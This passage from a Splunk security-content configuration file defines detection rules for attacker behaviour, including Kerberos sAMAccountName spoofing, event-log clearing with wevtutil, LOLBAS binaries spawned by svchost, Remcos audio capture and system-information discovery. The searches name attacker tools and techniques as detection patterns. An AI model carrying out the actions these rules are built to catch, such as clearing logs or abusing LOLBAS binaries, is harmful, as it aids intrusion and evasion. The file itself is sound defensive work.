search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=sqlite3 Processes.process=*LSQuarantine* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_sqlite3_lsquarantine_behavior_filter`

[ESCU - Suspicious Ticket Granting Ticket Request - Rule]
action.escu = 0
action.escu.enabled = 1
description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will need to request a Kerberos Ticket Granting Ticket (TGT) on behalf of the newly created and renamed computer account. The TGT request will be preceded by a computer account name change event. This analytic leverages Event ID 4781, `The name of an account was changed`, and Event ID 4768, `A Kerberos authentication ticket (TGT) was requested`, to correlate a sequence of events where the new computer account name on Event ID 4781 matches the requesting account on Event ID 4768. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will need to request a Kerberos Ticket Granting Ticket (TGT) on behalf of the newly created and renamed computer account. The TGT request will be preceded by a computer account name change event. This analytic leverages Event ID 4781, `The name of an account was changed`, and Event ID 4768, `A Kerberos authentication ticket (TGT) was requested`, to correlate a sequence of events where the new computer account name on Event ID 4781 matches the requesting account on Event ID 4768. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled.
action.escu.known_false_positives = A computer account name change event immediately followed by a Kerberos TGT request with matching fields is unusual. However, legitimate behavior may trigger it. Filter as needed.
action.escu.creation_date = 2021-12-21
action.escu.modification_date = 2021-12-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious Ticket Granting Ticket Request - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious Ticket Granting Ticket Request - Rule
action.correlationsearch.annotations = {"analytic_story": ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` (EventCode=4781 Old_Account_Name="*$" New_Account_Name!="*$") OR (EventCode=4768 Account_Name!="*$") | eval RenamedComputerAccount = coalesce(New_Account_Name, mvindex(Account_Name,0)) | transaction RenamedComputerAccount startswith=(EventCode=4781) endswith=(EventCode=4768) | eval short_lived=case((duration<2),"TRUE") | search short_lived = TRUE | table _time, ComputerName, EventCode, Account_Name,RenamedComputerAccount, short_lived |`suspicious_ticket_granting_ticket_request_filter`

[ESCU - Suspicious WAV file in Appdata Folder - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects the suspicious creation of a .wav file in the appdata folder. This behavior was seen in Remcos RAT malware, which stores its audio recordings in the appdata\audio folder as part of data collection. The recording can then be sent to its C2 server as part of exfiltration from the compromised machine. The creation of .wav files in this folder path is not a usual disk location for users to save audio files.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects the suspicious creation of a .wav file in the appdata folder. This behavior was seen in Remcos RAT malware, which stores its audio recordings in the appdata\audio folder as part of data collection. The recording can then be sent to its C2 server as part of exfiltration from the compromised machine. The creation of .wav files in this folder path is not a usual disk location for users to save audio files.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, file_name, file_path and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2022-07-07
action.escu.modification_date = 2022-07-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious WAV file in Appdata Folder - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Remcos"]
action.risk = 1
action.risk.param._risk_message = process $process_name$ creating image file $file_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious WAV file in Appdata Folder - Rule
action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects the suspicious creation of a .wav file in the appdata folder. This behavior was seen in Remcos RAT malware, which stores its audio recordings in the appdata\audio folder as part of data collection. The recording can then be sent to its C2 server as part of exfiltration from the compromised machine. The creation of .wav files in this folder path is not a usual disk location for users to save audio files.
action.notable.param.rule_title = Suspicious WAV file in Appdata Folder
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=*.exe Processes.process_path="*\\appdata\\Roaming\\*" by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid | `drop_dm_object_name(Processes)` |rename process_guid as proc_guid | join proc_guid, _time [ | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.wav") Filesystem.file_path = "*\\appdata\\Roaming\\*" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)` |rename process_guid as proc_guid | fields file_name file_path process_name process_path process dest file_create_time _time proc_guid] | `suspicious_wav_file_in_appdata_folder_filter`

[ESCU - Suspicious wevtutil Usage - Rule]
action.escu = 0
action.escu.enabled = 1
description = The wevtutil.exe application is the Windows event log utility. This searches for wevtutil.exe with parameters for clearing the application, security, setup, trace or system event logs.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.001", "T1070"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The wevtutil.exe application is the Windows event log utility. This searches for wevtutil.exe with parameters for clearing the application, security, setup, trace or system event logs.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = The wevtutil.exe application is a legitimate Windows event log utility. Administrators may use it to manage Windows event logs.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious wevtutil Usage - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Log Manipulation", "Ransomware", "Rhysida Ransomware", "Clop Ransomware", "CISA AA23-347A"]
action.risk = 1
action.risk.param._risk_message = Wevtutil.exe being used to clear Event Logs on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 28}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious wevtutil Usage - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Log Manipulation", "Ransomware", "Rhysida Ransomware", "Clop Ransomware", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.001", "T1070"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The wevtutil.exe application is the Windows event log utility. This searches for wevtutil.exe with parameters for clearing the application, security, setup, trace or system event logs.
action.notable.param.rule_title = Suspicious wevtutil Usage
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wevtutil.exe Processes.process IN ("* cl *", "*clear-log*") (Processes.process="*System*" OR Processes.process="*Security*" OR Processes.process="*Setup*" OR Processes.process="*Application*" OR Processes.process="*trace*") by Processes.process_name Processes.parent_process_name Processes.dest Processes.user| `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `suspicious_wevtutil_usage_filter`

[ESCU - Suspicious writes to windows Recycle Bin - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin to detect potential threats earlier and mitigate the risks. This detection is made by a Splunk query that utilizes the Endpoint.Filesystem data model and the Endpoint.Processes data model. The query looks for any process writing to the "*$Recycle.Bin*" file path, excluding explorer.exe. This detection is important because it suggests that an attacker is attempting to hide their activities by using the Recycle Bin, which can lead to data theft, ransomware, or other damaging outcomes. Detecting writes to the Recycle Bin by a process other than explorer.exe can help to investigate and determine if the activity is malicious or benign. False positives might occur since there might be legitimate uses of the Recycle Bin by processes other than explorer.exe. Next steps include reviewing the process writing to the Recycle Bin and any relevant on-disk artifacts upon triage.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin to detect potential threats earlier and mitigate the risks. This detection is made by a Splunk query that utilizes the Endpoint.Filesystem data model and the Endpoint.Processes data model. The query looks for any process writing to the "*$Recycle.Bin*" file path, excluding explorer.exe. This detection is important because it suggests that an attacker is attempting to hide their activities by using the Recycle Bin, which can lead to data theft, ransomware, or other damaging outcomes. Detecting writes to the Recycle Bin by a process other than explorer.exe can help to investigate and determine if the activity is malicious or benign. False positives might occur since there might be legitimate uses of the Recycle Bin by processes other than explorer.exe. Next steps include reviewing the process writing to the Recycle Bin and any relevant on-disk artifacts upon triage.
action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on filesystem and process logs responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` and `Filesystem` nodes.
action.escu.known_false_positives = Because the Recycle Bin is a hidden folder in modern versions of Windows, it would be unusual for a process other than explorer.exe to write to it. Incidents should be investigated as appropriate.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious writes to windows Recycle Bin - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Collection and Staging", "PlugX"]
action.risk = 1
action.risk.param._risk_message = Suspicious writes to windows Recycle Bin process $process_name$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Suspicious writes to windows Recycle Bin - Rule
action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging", "PlugX"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin to detect potential threats earlier and mitigate the risks. This detection is made by a Splunk query that utilizes the Endpoint.Filesystem data model and the Endpoint.Processes data model. The query looks for any process writing to the "*$Recycle.Bin*" file path, excluding explorer.exe. This detection is important because it suggests that an attacker is attempting to hide their activities by using the Recycle Bin, which can lead to data theft, ransomware, or other damaging outcomes. Detecting writes to the Recycle Bin by a process other than explorer.exe can help to investigate and determine if the activity is malicious or benign. False positives might occur since there might be legitimate uses of the Recycle Bin by processes other than explorer.exe. Next steps include reviewing the process writing to the Recycle Bin and any relevant on-disk artifacts upon triage.
action.notable.param.rule_title = Suspicious writes to windows Recycle Bin
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.file_path) as file_path values(Filesystem.file_name) as file_name FROM datamodel=Endpoint.Filesystem where Filesystem.file_path = "*$Recycle.Bin*" by Filesystem.process_name Filesystem.process_id Filesystem.dest | `drop_dm_object_name("Filesystem")` | join process_id [| tstats `security_content_summariesonly` values(Processes.user) as user values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name FROM datamodel=Endpoint.Processes where Processes.process_name != "explorer.exe" by Processes.process_id Processes.dest | `drop_dm_object_name("Processes")` | table user process_name process_id dest] | `suspicious_writes_to_windows_recycle_bin_filter`

[ESCU - Svchost LOLBAS Execution Process Spawn - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic is designed to spot instances of 'svchost.exe' initiating a Living Off The Land Binaries and Scripts (LOLBAS) execution process. Often, adversaries manipulate Task Scheduler to execute code on remote endpoints, resulting in the spawning of a malicious command as a child process of 'svchost.exe'. By tracking child processes of 'svchost.exe' that align with the LOLBAS project, potential lateral movement activity can be detected. The analytic examines process details, including the process name, parent process, and command-line executions. A comprehensive list of LOLBAS processes is included in the search parameters. Although the analytic might catch legitimate applications exhibiting this behavior, these instances should be filtered accordingly. The findings from this analytic offer valuable insight into potentially malicious activities on an endpoint.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic is designed to spot instances of 'svchost.exe' initiating a Living Off The Land Binaries and Scripts (LOLBAS) execution process. Often, adversaries manipulate Task Scheduler to execute code on remote endpoints, resulting in the spawning of a malicious command as a child process of 'svchost.exe'. By tracking child processes of 'svchost.exe' that align with the LOLBAS project, potential lateral movement activity can be detected. The analytic examines process details, including the process name, parent process, and command-line executions. A comprehensive list of LOLBAS processes is included in the search parameters. Although the analytic might catch legitimate applications exhibiting this behavior, these instances should be filtered accordingly. The findings from this analytic offer valuable insight into potentially malicious activities on an endpoint.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Legitimate applications may trigger this behavior, filter as needed.
action.escu.creation_date = 2021-11-22
action.escu.modification_date = 2021-11-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Svchost LOLBAS Execution Process Spawn - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"]
action.risk = 1
action.risk.param._risk_message = Svchost.exe spawned a LOLBAS process on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Svchost LOLBAS Execution Process Spawn - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic is designed to spot instances of 'svchost.exe' initiating a Living Off The Land Binaries and Scripts (LOLBAS) execution process. Often, adversaries manipulate Task Scheduler to execute code on remote endpoints, resulting in the spawning of a malicious command as a child process of 'svchost.exe'. By tracking child processes of 'svchost.exe' that align with the LOLBAS project, potential lateral movement activity can be detected. The analytic examines process details, including the process name, parent process, and command-line executions. A comprehensive list of LOLBAS processes is included in the search parameters. Although the analytic might catch legitimate applications exhibiting this behavior, these instances should be filtered accordingly. The findings from this analytic offer valuable insight into potentially malicious activities on an endpoint.
action.notable.param.rule_title = Svchost LOLBAS Execution Process Spawn
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=svchost.exe) (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe", "Rasautou.exe", "Schtasks.exe", "Xwizard.exe", "Pnputil.exe", "Atbroker.exe", "Pcwrun.exe", "Ttdinject.exe","Mshta.exe", "Bitsadmin.exe", "Certoc.exe", "Ieexec.exe", "Microsoft.Workflow.Compiler.exe", "Runscripthelper.exe", "Forfiles.exe", "Msbuild.exe", "Register-cimprovider.exe", "Tttracer.exe", "Ie4uinit.exe", "Bash.exe", "Hh.exe", "SettingSyncHost.exe", "Cmstp.exe", "Stordiag.exe", "Scriptrunner.exe", "Odbcconf.exe", "Extexport.exe", "Msdt.exe", "WorkFolders.exe", "Diskshadow.exe", "Mavinject.exe", "Regasm.exe", "Gpscript.exe", "Regsvr32.exe", "Msiexec.exe", "Wuauclt.exe", "Presentationhost.exe", "Wmic.exe", "Runonce.exe", "Syncappvpublishingserver.exe", "Verclsid.exe", "Infdefaultinstall.exe", "Installutil.exe", "Netsh.exe", "Wab.exe", "Dnscmd.exe", "At.exe", "Pcalua.exe", "Msconfig.exe")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `svchost_lolbas_execution_process_spawn_filter`

[ESCU - System Info Gathering Using Dxdiag Application - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious dxdiag.exe process command-line execution. Dxdiag is used to collect the system info of the target host. This technique has been used by Remcos RAT, various actors, and other malware to collect information as part of the recon or collection phase of an attack. This behavior should rarely be seen in a corporate network, but this command line can be used by a network administrator to audit host machine specifications. Thus in some rare cases, this detection will contain false positives in its results. To triage further, analyze what commands were passed after it pipes out the result to a file for further processing.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1592"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious dxdiag.exe process command-line execution. Dxdiag is used to collect the system info of the target host. This technique has been used by Remcos RAT, various actors, and other malware to collect information as part of the recon or collection phase of an attack. This behavior should rarely be seen in a corporate network, but this command line can be used by a network administrator to audit host machine specifications. Thus in some rare cases, this detection will contain false positives in its results. To triage further, analyze what commands were passed after it pipes out the result to a file for further processing.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = This command line can be used by a network administrator to audit host machine specifications. Thus, a filter is needed.
action.escu.creation_date = 2021-11-19
action.escu.modification_date = 2021-11-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - System Info Gathering Using Dxdiag Application - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Remcos"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - System Info Gathering Using Dxdiag Application - Rule
action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1592"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_dxdiag` AND Processes.process = "* /t *" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `system_info_gathering_using_dxdiag_application_filter`

[ESCU - System Information Discovery Detection - Rule]
action.escu = 0
action.escu.enabled = 1
description = Detect system information discovery techniques used by attackers to understand configurations of the system to further exploit it.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Detect system information discovery techniques used by attackers to understand configurations of the system to further exploit it.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators debugging servers action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - System Information Discovery Detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques"] action.risk = 1 action.risk.param._risk_message = Potential system information discovery behavior on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - System Information Discovery Detection - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Detect system information discovery techniques used by attackers to understand configurations of the system to further exploit it. 
action.notable.param.rule_title = System Information Discovery Detection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*wmic* qfe*" OR Processes.process=*systeminfo* OR Processes.process=*hostname*) by Processes.user Processes.process_name Processes.process Processes.dest Processes.parent_process_name | `drop_dm_object_name(Processes)` | eventstats dc(process) as dc_processes_by_dest by dest | where dc_processes_by_dest > 2 | stats values(process) as process min(firstTime) as firstTime max(lastTime) as lastTime by user, dest parent_process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `system_information_discovery_detection_filter` [ESCU - System Processes Run From Unexpected Locations - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for system processes that typically execute from `C:\Windows\System32\` or `C:\Windows\SysWOW64`. This may indicate a malicious process that is trying to hide as a legitimate process.\ This detection utilizes a lookup that is deduped `system32` and `syswow64` directories from Server 2016 and Windows 10.\ During triage, review the parallel processes - what process moved the native Windows binary? identify any artifacts on disk and review. If a remote destination is contacted, what is the reputation? 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1036.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for system processes that typically execute from `C:\Windows\System32\` or `C:\Windows\SysWOW64`. This may indicate a malicious process that is trying to hide as a legitimate process.\ This detection utilizes a lookup that is deduped `system32` and `syswow64` directories from Server 2016 and Windows 10.\ During triage, review the parallel processes - what process moved the native Windows binary? identify any artifacts on disk and review. If a remote destination is contacted, what is the reputation? action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This detection may require tuning based on third party applications utilizing native Windows binaries in non-standard paths. 
action.escu.creation_date = 2020-12-08 action.escu.modification_date = 2020-12-08 action.escu.confidence = high action.escu.full_search_name = ESCU - System Processes Run From Unexpected Locations - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions", "Unusual Processes", "Ransomware", "Masquerading - Rename System Utilities", "Qakbot", "Windows Error Reporting Service Elevation of Privilege Vulnerability", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = A System process $process_name$ is running from $process_path$ on $dest$, potentially non-standard. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = 